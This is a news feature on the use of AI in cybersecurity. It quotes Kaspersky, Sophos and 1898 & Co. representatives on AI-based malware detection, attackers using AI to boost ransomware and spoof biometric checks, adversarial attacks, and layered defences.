Cybersecurity companies have long been using artificial intelligence (AI) or machine learning to enhance visibility and detect security threats. The introduction of OpenAI’s ChatGPT, a chatbot capable of creating human-like conversations using natural language processing (NLP), has amplified the discussion on the advantages and disadvantages of AI in cybersecurity and whether its use should be regulated.
Today, the cybersecurity sector presents both benefits and drawbacks when it comes to AI implementation.
“I usually define AI in two layers — one is its ability to reduce initial threats, and the other is the heuristics/behavior analytics within the software to block and detect attacks in real-time,” said Adrian Hia, managing director for Asia Pacific at Kaspersky, in an email interview.
Sophos announces new open AI developments in cybersecurity
Kaspersky probes ChatGPT’s ability to fight cyber scam
Leveraging language models in security
Sophos, a cybersecurity-as-a-service (CaaS) company, holds an optimistic view of generative AI in mitigating attacks.
“We have been using artificial intelligence and various forms of machine learning for about six years now,” said Ben Verschaeren, a security specialist and Senior Manager for Global Solutions at Sophos, in an interview with Back End News.
Sophos’ data science team has developed algorithms to detect malware and malicious activities on endpoints and firewalls, effectively identifying abnormal behavior. According to Verschaeren, language models can help lower the barrier to entry in the cybersecurity field. Sophos believes that the AI model GPT-3 can filter malicious activity from its XDR Telemetry.
In its report titled “GPT for you and me: Applying AI language processing to cyber defenses,” Sophos details the progress of its three SophosAI projects, which aim to leverage the technology for strengthening cybersecurity solutions. These projects use “few-shot learning” to train the AI model with limited data samples.
On the other hand, Kaspersky has integrated AI into its Kaspersky for Android solution, which has successfully detected around 33% of all new Android threats. The product was developed in response to the initial malware attacks on Android OS users in 2009. Over time, Kaspersky’s solutions evolved, monitoring 467,515 samples per month in 2012.
Hia acknowledged that it is nearly impossible for humans alone to detect such a high volume of malware. So, Kaspersky combines machine learning (AI) with human expertise to combat cyber threats.
“AI is the next step in advancing digital technology, and we believe it is both disrupting and transforming every industry,” Hia said. “From a cybersecurity standpoint, we know that AI will play an essential role in protecting businesses from cyber threats. Just as cybercriminals have sophisticated tools and exploit AI to create new threats, businesses will have AI as an additional defense.”
“Enhancing” security threats
Matt Morris, security managing director of 1898 & Co., a global business and technology consultancy, cautions that threat actors can also take advantage of AI capabilities.
Morris stated in a virtual interview that AI enhances the capabilities of “commonplace attacks” like ransomware or malware infections.
“The ability of threat actors to develop and deploy code or malware has significantly improved due to advancements in AI over the past decade,” Morris said. “AI’s increased processing power and data consumption have made a noticeable difference.”
Morris emphasized that AI can influence attacks in the information technology landscape more easily than in operational technology. He explained that the processing capabilities required for AI are not universally available in operational technology environments.
Kaspersky’s research, conducted by its Global Research and Analysis Team (GReAT), reveals various applications of AI in cybercrime, including bypassing new authentication methods.
“For instance, in biometric authentication used by some financial institutions and banking apps, a user must look to the right, to the left, and then smile,” Hia said. “With AI tools, a cybercriminal can accomplish this with only a photo of the user (victim).”
As part of its ongoing research, Kaspersky explores the possibility of data poisoning and adversarial attacks through the use of AI.
“An adversarial attack involves making small changes to an object to misclassify them according to the machine learning model,” Hia explained.
He further noted that while real-world adversarial attacks are not yet widespread, they can be part of targeted attacks by highly skilled data scientists, requiring significant effort. However, these attacks are highly profitable as they can be used to create new strains of malware.
Generative AI
The deciding factor on whether generative AI is good or bad lies in the rules and moral standards followed by adversaries and security practitioners.
According to Morris, adversaries do not adhere to rules and can use AI however they please. On the other hand, defenders have specific rules to follow, especially in critical infrastructure environments.
Defenders aim to ensure the safety of people within these environments and maintain reliable operations. They face added constraints due to regulatory compliance, which establishes standards. Adversaries, in contrast, can utilize AI for perpetuating attacks, leveraging its capabilities and processing power in the most effective ways.
Using AI to counter AI
Hia warns that once machine learning algorithms are introduced into the real world, various types of attacks can manipulate them, leading to deliberate errors and significant damage. For example, misidentified Trojans can infect millions of devices, resulting in substantial losses for individuals and organizations.
Kaspersky advises security vendors to view ML methods as part of a multi-layered security approach that combines technology and human expertise for successful implementation. Hia suggests that ML/AI-specific security audits and red-teaming should be essential components of ML/AI development. It is crucial to have a clear understanding of the reliance on third-party data and architectures since attacks often exploit third-party inputs.
Hia believes that most core business processes will eventually rely on AI, making AI-enabled responses necessary to supplement human intelligence and strengthen cyber defenses.
“A multi-layered approach should be employed,” he said.
Morris poses the question of whether one would use AI to counter the use of AI in cybersecurity.
“For now, it is essential to establish a strong foundation and ensure preparedness upfront,” Morris said.
He emphasizes that organizations have the capacity to identify their most critical assets, and prevention remains a major component of cybersecurity.
“It is important to implement operational safeguards and various measures to support cybersecurity defenses,” he said. “Organizations should focus on upfront preparedness, conduct testing on instant response plans, and be ready to execute them efficiently. Adversaries will continue to leverage AI technology, so it is crucial to engineering out as much risk as possible by implementing monitoring and detection systems and having a solid response mechanism in place.”
Categories: Special Report
2 replies »